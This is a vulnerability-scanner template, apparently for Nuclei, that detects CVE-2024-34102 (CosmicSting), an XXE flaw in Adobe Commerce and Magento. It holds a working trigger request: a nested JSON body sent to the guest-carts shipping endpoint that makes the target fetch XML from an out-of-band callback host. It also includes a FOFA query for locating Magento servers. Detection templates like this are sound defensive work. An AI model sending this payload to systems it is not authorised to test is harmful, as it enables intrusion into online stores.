43 lines
1.7 KiB
YAML
43 lines
1.7 KiB
YAML
id: CVE-2024-34102
|
|
|
|
info:
|
|
name: Adobe Commerce & Magento - CosmicSting
|
|
author: DhiyaneshDK
|
|
severity: critical
|
|
description: |
|
|
Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.
|
|
reference:
|
|
- https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md
|
|
- https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2024-34102
|
|
cwe-id: CWE-611
|
|
cpe: cpe:2.3:a:adobe:magento:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: app="Adobe-Magento"
|
|
product: magento
|
|
vendor: adobe
|
|
tags: cve,cve2024,adobe,magento,xxe
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://{{interactsh-url}}/xxe.xml","dataIsURL":true,"options":12345678}}}}}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(interactsh_protocol, "dns")'
|
|
- 'contains(content_type, "application/json")'
|
|
- 'contains_any(body, "log file", "cartId", "no Route")'
|
|
- 'contains(body, "message")'
|
|
condition: and
|
|
# digest: 490a0046304402201dd817313b30b325a551cd864e8e6aa704baaf40ed4499a90322eca099a02b52022075bd298e3d882bec90994ae9dd137cda6a5eb849f12ac6a40a4f8529bf1d563c:922c64590222798bb761d5b6d8e72950 |